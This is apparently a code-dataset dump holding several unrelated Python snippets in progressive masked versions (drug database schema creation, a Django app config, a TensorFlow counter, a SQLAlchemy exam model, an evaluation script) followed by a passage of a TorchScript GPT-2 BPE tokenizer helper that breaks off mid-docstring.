varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n logger.info('Creating %d tables', len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-4": "import logging\nfrom tqdm import tqdm\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n with db_engine.connect() as conn:\n create_table_stmts = []\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n create_table_stmts.append(create_drugs_table)\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n logger.info('Creating %d tables', len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-5": "import logging\n\nfrom tqdm import tqdm\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n\n with db_engine.connect() as conn:\n create_table_stmts = []\n\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n\n create_table_stmts.append(create_drugs_table)\n\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n\n logger.info(\"Creating %d tables\", len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.apps import AppConfig
class NombreaplicacionConfig(AppConfig):
name = 'nombreAplicacion'
|
normal
|
{
"blob_id": "0c7efa99dc22154f9835b277cba5057b213a28e7",
"index": 2414,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass NombreaplicacionConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass NombreaplicacionConfig(AppConfig):\n name = 'nombreAplicacion'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass NombreaplicacionConfig(AppConfig):\n name = 'nombreAplicacion'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
TMP = getenv('TMP', '/tmp')
PYBITES_FAKER_DIR = Path(getenv('PYBITES_FAKER_DIR', TMP))
CACHE_FILENAME = 'pybites-fake-data.pkl'
FAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME
BITE_FEED = 'https://codechalleng.es/api/bites/'
BLOG_FEED = 'https://pybit.es/feeds/all.rss.xml'
Bite = namedtuple('Bite', 'number title level')
Article = namedtuple('Article', 'author title tags')
<|reserved_special_token_1|>
from collections import namedtuple
from os import getenv
from pathlib import Path
TMP = getenv('TMP', '/tmp')
PYBITES_FAKER_DIR = Path(getenv('PYBITES_FAKER_DIR', TMP))
CACHE_FILENAME = 'pybites-fake-data.pkl'
FAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME
BITE_FEED = 'https://codechalleng.es/api/bites/'
BLOG_FEED = 'https://pybit.es/feeds/all.rss.xml'
Bite = namedtuple('Bite', 'number title level')
Article = namedtuple('Article', 'author title tags')
<|reserved_special_token_1|>
from collections import namedtuple
from os import getenv
from pathlib import Path
TMP = getenv("TMP", "/tmp")
PYBITES_FAKER_DIR = Path(getenv("PYBITES_FAKER_DIR", TMP))
CACHE_FILENAME = "pybites-fake-data.pkl"
FAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME
BITE_FEED = "https://codechalleng.es/api/bites/"
BLOG_FEED = "https://pybit.es/feeds/all.rss.xml"
Bite = namedtuple("Bite", "number title level")
Article = namedtuple("Article", "author title tags")
|
flexible
|
{
"blob_id": "7336b8dec95d23cbcebbff2a813bbbd5575ba58f",
"index": 2327,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nTMP = getenv('TMP', '/tmp')\nPYBITES_FAKER_DIR = Path(getenv('PYBITES_FAKER_DIR', TMP))\nCACHE_FILENAME = 'pybites-fake-data.pkl'\nFAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME\nBITE_FEED = 'https://codechalleng.es/api/bites/'\nBLOG_FEED = 'https://pybit.es/feeds/all.rss.xml'\nBite = namedtuple('Bite', 'number title level')\nArticle = namedtuple('Article', 'author title tags')\n",
"step-3": "from collections import namedtuple\nfrom os import getenv\nfrom pathlib import Path\nTMP = getenv('TMP', '/tmp')\nPYBITES_FAKER_DIR = Path(getenv('PYBITES_FAKER_DIR', TMP))\nCACHE_FILENAME = 'pybites-fake-data.pkl'\nFAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME\nBITE_FEED = 'https://codechalleng.es/api/bites/'\nBLOG_FEED = 'https://pybit.es/feeds/all.rss.xml'\nBite = namedtuple('Bite', 'number title level')\nArticle = namedtuple('Article', 'author title tags')\n",
"step-4": "from collections import namedtuple\nfrom os import getenv\nfrom pathlib import Path\n\nTMP = getenv(\"TMP\", \"/tmp\")\nPYBITES_FAKER_DIR = Path(getenv(\"PYBITES_FAKER_DIR\", TMP))\nCACHE_FILENAME = \"pybites-fake-data.pkl\"\nFAKE_DATA_CACHE = PYBITES_FAKER_DIR / CACHE_FILENAME\nBITE_FEED = \"https://codechalleng.es/api/bites/\"\nBLOG_FEED = \"https://pybit.es/feeds/all.rss.xml\"\n\nBite = namedtuple(\"Bite\", \"number title level\")\nArticle = namedtuple(\"Article\", \"author title tags\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python3
import subprocess
import sys
import pickle
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
std_dir=sys.argv[1]
std_ans=sys.argv[2]
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
op_f = open('{}/jobs'.format(std_dir), 'w')
command = 'utils/single_query_example.py'
query = std_dir + '/query.pkl'
doc = std_dir + '/doc.pkl'
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(
command, query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir), shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call('utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.format(std_dir, std_dir), shell=True)
|
normal
|
{
"blob_id": "ba216642935d19b85e379b66fb514854ebcdedd9",
"index": 666,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) != 3:\n print('Usage: std_dev_eval.py <std_dir> <ans>')\n quit()\n<mask token>\nsubprocess.call('rm -f {}/result'.format(std_dir), shell=True)\n<mask token>\nwith open(query, 'rb') as fp:\n query_num = len(pickle.load(fp))\nfor idx in range(query_num):\n op_f.write('{} {} {} {} {} >>{}/querywise_result\\n'.format(command,\n query, doc, idx, std_ans, std_dir))\nop_f.close()\nsubprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),\n shell=True)\nsubprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)\nsubprocess.call(\n 'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.\n format(std_dir, std_dir), shell=True)\n",
"step-3": "<mask token>\nif len(sys.argv) != 3:\n print('Usage: std_dev_eval.py <std_dir> <ans>')\n quit()\nstd_dir = sys.argv[1]\nstd_ans = sys.argv[2]\nsubprocess.call('rm -f {}/result'.format(std_dir), shell=True)\nop_f = open('{}/jobs'.format(std_dir), 'w')\ncommand = 'utils/single_query_example.py'\nquery = std_dir + '/query.pkl'\ndoc = std_dir + '/doc.pkl'\nwith open(query, 'rb') as fp:\n query_num = len(pickle.load(fp))\nfor idx in range(query_num):\n op_f.write('{} {} {} {} {} >>{}/querywise_result\\n'.format(command,\n query, doc, idx, std_ans, std_dir))\nop_f.close()\nsubprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),\n shell=True)\nsubprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)\nsubprocess.call(\n 'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.\n format(std_dir, std_dir), shell=True)\n",
"step-4": "import subprocess\nimport sys\nimport pickle\nif len(sys.argv) != 3:\n print('Usage: std_dev_eval.py <std_dir> <ans>')\n quit()\nstd_dir = sys.argv[1]\nstd_ans = sys.argv[2]\nsubprocess.call('rm -f {}/result'.format(std_dir), shell=True)\nop_f = open('{}/jobs'.format(std_dir), 'w')\ncommand = 'utils/single_query_example.py'\nquery = std_dir + '/query.pkl'\ndoc = std_dir + '/doc.pkl'\nwith open(query, 'rb') as fp:\n query_num = len(pickle.load(fp))\nfor idx in range(query_num):\n op_f.write('{} {} {} {} {} >>{}/querywise_result\\n'.format(command,\n query, doc, idx, std_ans, std_dir))\nop_f.close()\nsubprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),\n shell=True)\nsubprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)\nsubprocess.call(\n 'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.\n format(std_dir, std_dir), shell=True)\n",
"step-5": "#!/usr/bin/env python3\nimport subprocess\nimport sys\nimport pickle\n\nif len(sys.argv) != 3:\n print('Usage: std_dev_eval.py <std_dir> <ans>')\n quit()\n\nstd_dir=sys.argv[1]\nstd_ans=sys.argv[2]\n\nsubprocess.call('rm -f {}/result'.format(std_dir), shell=True)\n\nop_f = open('{}/jobs'.format(std_dir), 'w')\n\ncommand = 'utils/single_query_example.py'\nquery = std_dir + '/query.pkl'\ndoc = std_dir + '/doc.pkl'\n\nwith open(query, 'rb') as fp:\n query_num = len(pickle.load(fp))\n\nfor idx in range(query_num):\n op_f.write('{} {} {} {} {} >>{}/querywise_result\\n'.format(\n command, query, doc, idx, std_ans, std_dir))\nop_f.close()\n\nsubprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir), shell=True)\nsubprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)\nsubprocess.call('utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.format(std_dir, std_dir), shell=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with tf.Session() as sess:
sess.run(init_op)
print(sess.run(state))
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
state = tf.Variable(0, name='counter')
one = tf.constant(1)
new_value = tf.add(state, one)
update = tf.assign(state, new_value)
init_op = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init_op)
print(sess.run(state))
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import tensorflow as tf
state = tf.Variable(0, name='counter')
one = tf.constant(1)
new_value = tf.add(state, one)
update = tf.assign(state, new_value)
init_op = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init_op)
print(sess.run(state))
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
<|reserved_special_token_1|>
# coding: utf-8
"""
最简单的计数器,仅仅为了展示基本方式
"""
import tensorflow as tf
# 创建一个变量, 初始化为标量 0
state = tf.Variable(0, name="counter")
# 创建一个operation, 其作用是使state 增加 1
one = tf.constant(1)
new_value = tf.add(state, one)
update = tf.assign(state, new_value) # 这样才能重复执行+1的操作,实际上就代表:state=new_value
# 启动图后, 变量必须先经过`初始化` (init) op 初始化,
# 首先必须增加一个`初始化` op 到图中.
init_op = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init_op) # 运行 init_op
print(sess.run(state)) # 打印出事状态
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
|
flexible
|
{
"blob_id": "cf4582f4d0c6c94e617270a45425fe0b770142e0",
"index": 2937,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith tf.Session() as sess:\n sess.run(init_op)\n print(sess.run(state))\n for _ in range(10):\n sess.run(new_value)\n print(sess.run(new_value))\n",
"step-3": "<mask token>\nstate = tf.Variable(0, name='counter')\none = tf.constant(1)\nnew_value = tf.add(state, one)\nupdate = tf.assign(state, new_value)\ninit_op = tf.initialize_all_variables()\nwith tf.Session() as sess:\n sess.run(init_op)\n print(sess.run(state))\n for _ in range(10):\n sess.run(new_value)\n print(sess.run(new_value))\n",
"step-4": "<mask token>\nimport tensorflow as tf\nstate = tf.Variable(0, name='counter')\none = tf.constant(1)\nnew_value = tf.add(state, one)\nupdate = tf.assign(state, new_value)\ninit_op = tf.initialize_all_variables()\nwith tf.Session() as sess:\n sess.run(init_op)\n print(sess.run(state))\n for _ in range(10):\n sess.run(new_value)\n print(sess.run(new_value))\n",
"step-5": "# coding: utf-8\n\"\"\"\n最简单的计数器,仅仅为了展示基本方式\n\"\"\"\nimport tensorflow as tf\n\n# 创建一个变量, 初始化为标量 0\nstate = tf.Variable(0, name=\"counter\")\n\n# 创建一个operation, 其作用是使state 增加 1\none = tf.constant(1)\nnew_value = tf.add(state, one)\nupdate = tf.assign(state, new_value) # 这样才能重复执行+1的操作,实际上就代表:state=new_value\n\n# 启动图后, 变量必须先经过`初始化` (init) op 初始化,\n# 首先必须增加一个`初始化` op 到图中.\ninit_op = tf.initialize_all_variables()\n\nwith tf.Session() as sess:\n sess.run(init_op) # 运行 init_op\n\n print(sess.run(state)) # 打印出事状态\n\n for _ in range(10):\n sess.run(new_value)\n print(sess.run(new_value))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Problem 20: Factorial digit sum
def factorial(num):
sum = 1
while num != 0:
sum *= num
num -= 1
return sum
def sum_digits(num):
sum = 0
while num != 0:
sum += num % 10
num //= 10
return sum
print(sum_digits(factorial(100)))
|
normal
|
{
"blob_id": "cc6f02f9e1633fa15b97af5f926e083a65a8336e",
"index": 5977,
"step-1": "<mask token>\n",
"step-2": "def factorial(num):\n sum = 1\n while num != 0:\n sum *= num\n num -= 1\n return sum\n\n\n<mask token>\n",
"step-3": "def factorial(num):\n sum = 1\n while num != 0:\n sum *= num\n num -= 1\n return sum\n\n\ndef sum_digits(num):\n sum = 0\n while num != 0:\n sum += num % 10\n num //= 10\n return sum\n\n\n<mask token>\n",
"step-4": "def factorial(num):\n sum = 1\n while num != 0:\n sum *= num\n num -= 1\n return sum\n\n\ndef sum_digits(num):\n sum = 0\n while num != 0:\n sum += num % 10\n num //= 10\n return sum\n\n\nprint(sum_digits(factorial(100)))\n",
"step-5": "# Problem 20: Factorial digit sum\n\ndef factorial(num):\n sum = 1\n while num != 0:\n sum *= num\n num -= 1\n return sum\n\ndef sum_digits(num):\n sum = 0\n while num != 0:\n sum += num % 10\n num //= 10\n return sum\n\nprint(sum_digits(factorial(100)))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
print("HELLO3")
|
normal
|
{
"blob_id": "74be250df785590ecf45e048b0d6189e2b445889",
"index": 2181,
"step-1": "<mask token>\n",
"step-2": "print('HELLO3')\n",
"step-3": "print(\"HELLO3\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# coding: utf-8
from sqlalchemy import Column, DateTime, Integer, String
from sqlalchemy.schema import FetchedValue
from application import db
class BmExam(db.Model):
__tablename__ = 'bm_exam'
id = db.Column(db.Integer, primary_key=True)
status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
exam_id = db.Column(db.Integer, nullable=False)
exam_name = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())
show_exam_name = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())
numbers = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
x_rules = db.Column(db.String(1000), nullable=False, server_default=db.FetchedValue())
m_rules = db.Column(db.String(1000), nullable=False, server_default=db.FetchedValue())
rule_status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
start_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
end_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
beizhu = db.Column(db.String(2000), nullable=False, server_default=db.FetchedValue())
beizhu2 = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())
beizhu3 = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())
updated_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
created_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
|
normal
|
{
"blob_id": "6be2cc99d03596715d76cda41d63b8c91c829498",
"index": 2211,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass BmExam(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass BmExam(db.Model):\n __tablename__ = 'bm_exam'\n id = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n exam_id = db.Column(db.Integer, nullable=False)\n exam_name = db.Column(db.String(200), nullable=False, server_default=db\n .FetchedValue())\n show_exam_name = db.Column(db.String(200), nullable=False,\n server_default=db.FetchedValue())\n numbers = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n x_rules = db.Column(db.String(1000), nullable=False, server_default=db.\n FetchedValue())\n m_rules = db.Column(db.String(1000), nullable=False, server_default=db.\n FetchedValue())\n rule_status = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n start_time = db.Column(db.DateTime, nullable=False, server_default=db.\n FetchedValue())\n end_time = db.Column(db.DateTime, nullable=False, server_default=db.\n FetchedValue())\n beizhu = db.Column(db.String(2000), nullable=False, server_default=db.\n FetchedValue())\n beizhu2 = db.Column(db.String(200), nullable=False, server_default=db.\n FetchedValue())\n beizhu3 = db.Column(db.String(200), nullable=False, server_default=db.\n FetchedValue())\n updated_time = db.Column(db.DateTime, nullable=False, server_default=db\n .FetchedValue())\n created_time = db.Column(db.DateTime, nullable=False, server_default=db\n .FetchedValue())\n",
"step-4": "from sqlalchemy import Column, DateTime, Integer, String\nfrom sqlalchemy.schema import FetchedValue\nfrom application import db\n\n\nclass BmExam(db.Model):\n __tablename__ = 'bm_exam'\n id = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n exam_id = db.Column(db.Integer, nullable=False)\n exam_name = db.Column(db.String(200), nullable=False, server_default=db\n .FetchedValue())\n show_exam_name = db.Column(db.String(200), nullable=False,\n server_default=db.FetchedValue())\n numbers = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n x_rules = db.Column(db.String(1000), nullable=False, server_default=db.\n FetchedValue())\n m_rules = db.Column(db.String(1000), nullable=False, server_default=db.\n FetchedValue())\n rule_status = db.Column(db.Integer, nullable=False, server_default=db.\n FetchedValue())\n start_time = db.Column(db.DateTime, nullable=False, server_default=db.\n FetchedValue())\n end_time = db.Column(db.DateTime, nullable=False, server_default=db.\n FetchedValue())\n beizhu = db.Column(db.String(2000), nullable=False, server_default=db.\n FetchedValue())\n beizhu2 = db.Column(db.String(200), nullable=False, server_default=db.\n FetchedValue())\n beizhu3 = db.Column(db.String(200), nullable=False, server_default=db.\n FetchedValue())\n updated_time = db.Column(db.DateTime, nullable=False, server_default=db\n .FetchedValue())\n created_time = db.Column(db.DateTime, nullable=False, server_default=db\n .FetchedValue())\n",
"step-5": "# coding: utf-8\nfrom sqlalchemy import Column, DateTime, Integer, String\nfrom sqlalchemy.schema import FetchedValue\nfrom application import db\n\n\nclass BmExam(db.Model):\n __tablename__ = 'bm_exam'\n\n id = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())\n exam_id = db.Column(db.Integer, nullable=False)\n exam_name = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())\n show_exam_name = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())\n numbers = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())\n x_rules = db.Column(db.String(1000), nullable=False, server_default=db.FetchedValue())\n m_rules = db.Column(db.String(1000), nullable=False, server_default=db.FetchedValue())\n rule_status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())\n start_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())\n end_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())\n beizhu = db.Column(db.String(2000), nullable=False, server_default=db.FetchedValue())\n beizhu2 = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())\n beizhu3 = db.Column(db.String(200), nullable=False, server_default=db.FetchedValue())\n updated_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())\n created_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ModelIncrStateFlattener(BaseIncrStateFlattener):
<|reserved_special_token_0|>
def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,
torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
new_structured_incr_state = (self.module.
reorder_decoder_incremental_state(incremental_state=
structured_incr_state, inds=inds))
return self._flatten_incr_state(new_structured_incr_state)
def output(self, tensor: torch.Tensor) ->torch.Tensor:
return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
"""
Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
"""
@classmethod
def findall(cls, text: str) ->List[str]:
"""
Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
"""
contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
tokens: List[str] = []
idx = 0
num_passes = 0
while idx < len(text):
num_passes += 1
if num_passes > 10000:
return [
'*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'
]
if text[idx] == "'":
captured_suffix = False
for ending in contraction_endings:
if text[idx + 1:idx + 1 + len(ending)] == ending:
tokens.append("'" + ending)
idx += 1 + len(ending)
captured_suffix = True
break
if captured_suffix:
continue
if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(
text) and not text[idx + 1].isspace():
if text[idx] == ' ':
last_matching_idx = idx + 1
else:
last_matching_idx = idx
if text[last_matching_idx].isalpha():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isalpha():
last_matching_idx += 1
elif text[last_matching_idx].isnumeric():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
else:
while last_matching_idx + 1 < len(text) and not text[
last_matching_idx + 1].isspace() and not text[
last_matching_idx + 1].isalpha() and not text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
tokens.append(text[idx:last_matching_idx + 1])
idx = last_matching_idx + 1
continue
if idx + 1 < len(text) and text[idx + 1].isspace():
last_space_idx = idx + 1
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
if last_space_idx + 1 == len(text):
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
else:
tokens.append(text[idx:last_space_idx])
idx = last_space_idx
continue
if True:
last_space_idx = idx
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
return tokens
def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],
byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str]):
self.add_prefix_space = add_prefix_space
self.encoder = encoder
self.decoder: Dict[str, str] = {}
for k, v in self.encoder.items():
self.decoder[v] = k
self.byte_encoder = byte_encoder
self.byte_decoder: Dict[str, int] = {}
for k, v in self.byte_encoder.items():
self.byte_decoder[v] = k
self.bpe_ranks = fused_key_bpe_ranks
self._special_tokens: Dict[str, int] = {}
for st in special_tokens:
self._special_tokens[st] = 1
def encode(self, text: str) ->List[str]:
"""
Tokenize text.
Checks for add_prefix_space; handles accordingly.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
if self.add_prefix_space:
text = f' {text}'
FINAL = 1
SPLITABLE = 0
pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
for special_token in self._special_tokens.keys():
i = 0
while i < len(pieces):
subtext, status = pieces[i]
if status == FINAL:
i += 1
continue
split = subtext.split(special_token)
if len(split) > 1:
pieces.pop(i)
for j, piece in enumerate(split):
if j > 0:
pieces.insert(i + j, (special_token, FINAL))
pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
else:
i += 1
output: List[str] = []
for piece, state in pieces:
if state is FINAL:
output.append(piece)
else:
output += self.helper_encode(piece)
text = ''.join(output)
return output
def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:
"""
Return set of symbol pairs in a word.
Word is represented as list of symbols (symbols being variable-length strings).
:param word:
word to symbolize
:return pairs:
set of tuples of symbols
"""
pairs: List[Tuple[str, str]] = []
prev_char = word[0]
for char in word[1:]:
pairs.append((prev_char, char))
prev_char = char
return pairs
def bpe(self, word: List[str]) ->List[str]:
"""
Convert token to BPE.
:param word:
list of tokens token to convert
:return bpe_encoding:
string bpe encoding
"""
pairs = self.get_pairs(word)
if len(pairs) == 0:
return word
while True:
min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
bigram = pairs[0]
for pair in pairs[1:]:
current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf')
)
if current_rank < min_rank:
min_rank = current_rank
bigram = pair
if '\n'.join(bigram) not in self.bpe_ranks:
break
first, second = bigram
new_word: List[str] = []
i = 0
while i < len(word):
found = False
for j in range(i, len(word)):
if word[j] == first:
new_word.extend(word[i:j])
i = j
found = True
break
if not found:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word) - 1 and word[i + 1
] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
word = new_word.copy()
if len(word) == 1:
break
else:
pairs = self.get_pairs(word)
return word
def helper_encode(self, text: str) ->List[str]:
"""
Tokenize text.
:param text:
